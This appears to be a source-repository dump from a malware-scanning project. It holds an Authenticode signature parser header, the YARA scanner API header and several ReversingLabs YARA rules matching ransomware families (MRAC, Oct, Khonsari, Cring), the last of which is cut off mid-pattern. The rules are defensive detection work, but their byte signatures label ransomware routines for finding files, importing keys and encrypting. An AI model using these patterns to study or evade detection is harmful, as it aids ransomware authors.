CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 
*/

#ifndef AUTHENTICODE_PARSER_STRUCTS_H
#define AUTHENTICODE_PARSER_STRUCTS_H

// NOTE(review): the four include targets were lost in extraction. The types
// used below (ASN1_BMPSTRING, ASN1_IA5STRING, ASN1_OCTET_STRING, ASN1_OBJECT,
// ASN1_TYPE, ASN1_BIT_STRING) and the DECLARE_ASN1_FUNCTIONS macro come from
// the ASN.1 headers of the OpenSSL-style library this parser is built on.
#include
#include
#include
#include

#ifdef __cplusplus
extern "C" {
#endif

// Dotted-string OIDs used in Authenticode signatures. All sit under the
// 1.3.6.1.4.1.311 arc (Microsoft). They are compared as text against the
// OIDs found in the signature, so keep them byte-exact.
#define NID_spc_info "1.3.6.1.4.1.311.2.1.12"
#define NID_spc_ms_countersignature "1.3.6.1.4.1.311.3.3.1"
#define NID_spc_nested_signature "1.3.6.1.4.1.311.2.4.1"
#define NID_spc_indirect_data "1.3.6.1.4.1.311.2.1.4"

// The structs below mirror the ASN.1 CHOICE/SEQUENCE definitions of the SPC
// (Software Publisher Certificate) content. They are populated by decoding
// data taken from a PE file's signature blob, i.e. untrusted input.
// NOTE(review): in OpenSSL-style decoders, OPTIONAL members and the untaken
// arms of a CHOICE are left NULL; callers should null-check every pointer
// member before dereferencing — confirm against the decoder in use.

// CHOICE of a UTF-16 (BMP) or ASCII (IA5) string; `type` selects the arm.
typedef struct {
    int type;
    union {
        ASN1_BMPSTRING *unicode;
        ASN1_IA5STRING *ascii;
    } value;
} SpcString;

// Opaque serialized object: a class identifier plus its raw payload bytes.
typedef struct {
    ASN1_OCTET_STRING *classId;
    ASN1_OCTET_STRING *serializedData;
} SpcSerializedObject;

// CHOICE of url / moniker / file; `type` selects which union member is set.
typedef struct {
    int type;
    union {
        ASN1_IA5STRING *url;
        SpcSerializedObject *moniker;
        SpcString *file;
    } value;
} SpcLink;

// Generic (OID, optional ANY) pair.
typedef struct {
    ASN1_OBJECT *type;
    ASN1_TYPE *value;
} SpcAttributeTypeAndOptionalValue;

typedef struct {
    ASN1_BIT_STRING *flags;
    SpcLink *file;
} SpcPeImageData;

// Hash/signature algorithm OID plus its (possibly absent) parameters.
typedef struct {
    ASN1_OBJECT *algorithm;
    ASN1_TYPE *parameters;
} AlgorithmIdentifier;

// Digest algorithm and the digest bytes it produced.
typedef struct {
    AlgorithmIdentifier *digestAlgorithm;
    ASN1_OCTET_STRING *digest;
} DigestInfo;

// Payload of the SPC indirect-data content: the attribute describing what was
// hashed and the DigestInfo carrying the hash.
typedef struct {
    SpcAttributeTypeAndOptionalValue *data;
    DigestInfo *messageDigest;
} SpcIndirectDataContent;

// ContentInfo wrapper: contentType OID plus the indirect-data content.
typedef struct {
    ASN1_OBJECT *contentType;
    SpcIndirectDataContent *content;
} SpcContentInfo;

// Publisher-supplied program name and "more info" link.
typedef struct {
    SpcString *programName;
    SpcLink *moreInfo;
} SpcSpOpusInfo;

// Generates the new/free/d2i/i2d function prototypes for each struct above.
DECLARE_ASN1_FUNCTIONS(SpcString)
DECLARE_ASN1_FUNCTIONS(SpcSerializedObject)
DECLARE_ASN1_FUNCTIONS(SpcLink)
DECLARE_ASN1_FUNCTIONS(SpcAttributeTypeAndOptionalValue)
DECLARE_ASN1_FUNCTIONS(SpcPeImageData)
DECLARE_ASN1_FUNCTIONS(AlgorithmIdentifier)
DECLARE_ASN1_FUNCTIONS(DigestInfo) 103 | DECLARE_ASN1_FUNCTIONS(SpcIndirectDataContent) 104 | DECLARE_ASN1_FUNCTIONS(SpcSpOpusInfo) 105 | DECLARE_ASN1_FUNCTIONS(SpcContentInfo) 106 | 107 | #ifdef __cplusplus 108 | } 109 | #endif 110 | 111 | #endif 112 | -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.MRAC.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Ransomware_MRAC : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "MRAC" 12 | description = "Yara rule that detects MRAC ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "MRAC" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $encrypt_files = { 21 | B8 ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 22 | 83 C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B 75 ?? 85 C0 75 ?? B1 23 | ?? EB ?? 32 C9 8B 45 ?? 88 4D ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ?? 8B C6 81 F9 ?? 24 | ?? ?? ?? 72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ?? 25 | 8A 4D ?? 83 C4 ?? 8A C1 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? 26 | ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8 27 | } 28 | 29 | $import_key = { 30 | 8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 31 | C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 32 | ?? 89 45 ?? 8D 4D ?? 51 50 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? 33 | ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 34 | 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 35 | 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? FF 36 | 75 ?? 
FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F 37 | 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 38 | 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 39 | ?? ?? ?? ?? 8B C8 F6 C1 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 C1 E8 ?? 40 C1 E0 ?? 2B 40 | C1 68 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 6A 41 | ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 42 | 8B 45 ?? 3D ?? ?? ?? ?? 0F 92 C3 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 57 6A ?? 0F 43 | B6 C3 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 | 45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? EB ?? 8B 75 ?? 84 45 | DB 74 46 | } 47 | 48 | $find_files = { 49 | 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 50 | 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 51 | C4 ?? 85 C0 74 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 68 ?? ?? 52 | ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 06 FF 53 | D7 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 54 | F6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 55 | 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 56 | } 57 | 58 | condition: 59 | uint16(0) == 0x5A4D and 60 | ( 61 | $find_files 62 | ) and 63 | ( 64 | $import_key 65 | ) and 66 | ( 67 | $encrypt_files 68 | ) 69 | } -------------------------------------------------------------------------------- /src/lib/include/yara/scanner.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2018. The YARA Authors. All Rights Reserved. 
3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/

#ifndef YR_SCANNER_H
#define YR_SCANNER_H

// NOTE(review): the three include targets were lost in extraction; this header
// needs the project types used below (YR_SCAN_CONTEXT, YR_RULES,
// YR_CALLBACK_FUNC, YR_MEMORY_BLOCK_ITERATOR, YR_FILE_DESCRIPTOR, YR_RULE,
// YR_STRING, YR_RULE_PROFILING_INFO) plus the YR_API linkage macro.
#include
#include
#include

// A scanner is a scan context bound to one compiled rule set. The int-returning
// functions below follow the library's error-code convention; the exact codes
// live in the project's error header and are not visible here.
typedef YR_SCAN_CONTEXT YR_SCANNER;

// Creates a scanner over `rules`; the result is returned through `scanner`.
// Release it with yr_scanner_destroy().
YR_API int yr_scanner_create(YR_RULES* rules, YR_SCANNER** scanner);

// Frees a scanner created by yr_scanner_create().
YR_API void yr_scanner_destroy(YR_SCANNER* scanner);

// Installs the callback that receives scan events; `user_data` is handed back
// to it untouched. The callback runs while untrusted data is being scanned,
// so keep it defensive.
YR_API void yr_scanner_set_callback(
    YR_SCANNER* scanner,
    YR_CALLBACK_FUNC callback,
    void* user_data);

// Sets the scan timeout. NOTE(review): the unit of `timeout` is not visible
// from this header — confirm (likely seconds) before relying on it as a
// denial-of-service bound for adversarial inputs.
YR_API void yr_scanner_set_timeout(YR_SCANNER* scanner, int timeout);

// Sets scan flags (bit set; the flag values are defined elsewhere).
YR_API void yr_scanner_set_flags(YR_SCANNER* scanner, int flags);

// External variables: bind `identifier`, as used by the rules, to a value for
// this scanner. The string variant is given a NUL-terminated C string.
YR_API int yr_scanner_define_integer_variable(
    YR_SCANNER* scanner,
    const char* identifier,
    int64_t value);

YR_API int yr_scanner_define_boolean_variable(
    YR_SCANNER* scanner,
    const char* identifier,
    int value);

YR_API int yr_scanner_define_float_variable(
    YR_SCANNER* scanner,
    const char* identifier,
    double value);

YR_API int yr_scanner_define_string_variable(
    YR_SCANNER* scanner,
    const char* identifier,
    const char* value);

// Scan targets. The memory variant takes a caller-owned buffer of exactly
// `buffer_size` bytes; the block-iterator variant lets the caller supply the
// data incrementally; the file/fd/proc variants open the target themselves.
YR_API int yr_scanner_scan_mem_blocks(
    YR_SCANNER* scanner,
    YR_MEMORY_BLOCK_ITERATOR* iterator);

YR_API int yr_scanner_scan_mem(
    YR_SCANNER* scanner,
    const uint8_t* buffer,
    size_t buffer_size);

YR_API int yr_scanner_scan_file(YR_SCANNER* scanner, const char* filename);

YR_API int yr_scanner_scan_fd(YR_SCANNER* scanner, YR_FILE_DESCRIPTOR fd);

// Scans the process identified by `pid`. Reading another process's memory
// requires the corresponding OS privilege; expect failures otherwise.
YR_API int yr_scanner_scan_proc(YR_SCANNER* scanner, int pid);

// After a failed scan: the rule / string that was being evaluated when the
// error occurred (diagnostic aid for mis-behaving rules).
YR_API YR_RULE* yr_scanner_last_error_rule(YR_SCANNER* scanner);

YR_API YR_STRING* yr_scanner_last_error_string(YR_SCANNER* scanner);

// Per-rule profiling data accumulated by this scanner; reset clears it and
// print writes it out (destination not visible from this header).
YR_API YR_RULE_PROFILING_INFO* yr_scanner_get_profiling_info(
    YR_SCANNER* scanner);

YR_API void yr_scanner_reset_profiling_info(YR_SCANNER* scanner);

YR_API int yr_scanner_print_profiling_info(YR_SCANNER* scanner);
97 | 98 | #endif 99 | -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Oct.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Oct : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "OCT" 12 | description = "Yara rule that detects Oct ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Oct" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $encrypt_files = { 21 | 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 03 0B 07 18 73 ?? ?? ?? ?? 0C 73 22 | ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 04 06 23 | 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F 24 | ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 19 6F ?? 25 | ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? 26 | ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 13 ?? 15 33 27 | ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 28 | 13 ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A 29 | } 30 | 31 | $find_files = { 32 | 16 0A 38 ?? ?? ?? ?? 16 0B 2B ?? 02 06 9A 28 ?? ?? ?? ?? 2C ?? 02 06 9A 73 ?? ?? ?? ?? 33 | 0C 08 72 ?? ?? ?? ?? 03 07 9A 28 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0D 09 13 ?? 16 13 ?? 2B 34 | ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 05 28 ?? ?? ?? ?? 1E 35 | 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 36 | 11 ?? 8E 69 32 ?? 07 17 58 0B 07 03 8E 69 32 ?? 06 17 58 0A 06 02 8E 69 3F ?? ?? ?? ?? 37 | 2A 38 | } 39 | 40 | $collect_env_and_start_enc_proc = { 41 | 19 8D ?? ?? ?? ?? 0B 07 16 16 28 ?? ?? ?? ?? 
72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 17 1B 42 | 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 18 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? 43 | ?? 28 ?? ?? ?? ?? A2 07 1F ?? 8D ?? ?? ?? ?? 0C 08 16 72 ?? ?? ?? ?? A2 08 17 72 ?? ?? 44 | ?? ?? A2 08 18 72 ?? ?? ?? ?? A2 08 19 72 ?? ?? ?? ?? A2 08 1A 72 ?? ?? ?? ?? A2 08 1B 45 | 72 ?? ?? ?? ?? A2 08 1C 72 ?? ?? ?? ?? A2 08 1D 72 ?? ?? ?? ?? A2 08 1E 72 ?? ?? ?? ?? 46 | A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 47 | 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 48 | 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? 49 | ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? 50 | ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 72 ?? ?? ?? ?? 72 ?? ?? 51 | ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 52 | 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 72 ?? ?? ?? ?? 16 53 | 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 72 ?? ?? 54 | ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A 55 | } 56 | 57 | condition: 58 | uint16(0) == 0x5A4D and 59 | ( 60 | $collect_env_and_start_enc_proc 61 | ) and 62 | ( 63 | $find_files 64 | ) and 65 | ( 66 | $encrypt_files 67 | ) 68 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Khonsari.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Khonsari : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "KHONSARI" 12 | description = "Yara rule that detects Khonsari ransomware." 
13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Khonsari" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $find_files = { 21 | 73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 22 | 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 0B 23 | 16 0C 2B ?? 07 08 9A 0D 09 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? 24 | ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 09 25 | 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 06 1B 28 ?? ?? ?? ?? 6F ?? 26 | ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 27 | 06 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 28 | ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 29 | 06 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 30 | 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 2D ?? 00 11 31 | ?? 7E ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 72 ?? 32 | ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? 33 | ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F 34 | ?? ?? ?? ?? DC DE ?? 26 DE ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ?? 35 | ?? ?? ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 36 | 28 ?? ?? ?? ?? 26 2A 37 | } 38 | 39 | $get_key = { 40 | 73 ?? ?? ?? ?? 0A 06 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 41 | ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D 42 | ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? 43 | ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 07 6F ?? 44 | ?? ?? ?? 06 02 7B ?? ?? ?? ?? 
17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 45 | ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ?? 46 | ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A 47 | } 48 | 49 | $encrypt_files = { 50 | 28 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 6F ?? ?? ?? ?? 06 20 51 | ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 6F ?? ?? 52 | ?? ?? 06 19 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F 53 | ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 02 03 07 28 ?? ?? 54 | ?? ?? 0C DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A 55 | } 56 | 57 | condition: 58 | uint16(0) == 0x5A4D and 59 | ( 60 | $find_files 61 | ) and 62 | ( 63 | $get_key 64 | ) and 65 | ( 66 | $encrypt_files 67 | ) 68 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Cring.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Cring : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "CRING" 12 | description = "Yara rule that detects Cring ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Cring" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $find_files_p1 = { 21 | 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 19 2E ?? 08 6F ?? ?? ?? ?? 22 | 18 33 ?? 08 6F ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 02 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 23 | 0D 2B ?? 09 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09 6F 24 | ?? ?? ?? ?? DC 07 17 58 0B 07 06 8E 69 32 ?? 2A 25 | } 26 | 27 | $find_files_p2 = { 28 | 02 7B ?? ?? ?? ?? 0B 07 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
?? ?? ?? ?? ?? ?? 16 0A DD ?? 29 | ?? ?? ?? 02 15 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? 30 | ?? ?? 14 0C 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 2C 31 | ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 2B ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 32 | 9A 0D 02 09 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 17 0A DD ?? ?? ?? ?? 02 15 7D ?? ?? ?? 33 | ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 8E 69 34 | 32 ?? 02 14 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 14 0C 02 7B ?? ?? ?? ?? 28 35 | ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 39 ?? ?? ?? ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? 36 | ?? 38 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 9A 13 ?? 02 11 ?? 02 7B ?? ?? ?? 37 | ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 1F ?? 7D ?? ?? ?? 38 | ?? 2B ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 7D ?? ?? ?? ?? 02 18 7D ?? ?? 39 | ?? ?? 17 0A DE ?? 02 1F ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 28 40 | ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ?? 41 | ?? ?? 02 7B ?? ?? ?? ?? 8E 69 3F ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 16 0A DE ?? 02 28 ?? 42 | ?? ?? ?? DC 06 2A 43 | } 44 | 45 | $encrypt_files = { 46 | 16 0A 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 1E 5B 8D ?? ?? ?? ?? 0C 07 6F ?? ?? ?? ?? 1E 47 | 5B 8D ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 08 6F ?? ?? ?? ?? 11 ?? 09 6F ?? ?? ?? 48 | ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 8E 69 09 8E 69 58 8D ?? ?? ?? ?? 13 ?? 49 | 08 11 ?? 08 8E 69 28 ?? ?? ?? ?? 09 16 11 ?? 08 8E 69 09 8E 69 28 ?? ?? ?? ?? 11 ?? 04 50 | 28 ?? ?? ?? ?? 13 ?? 11 ?? 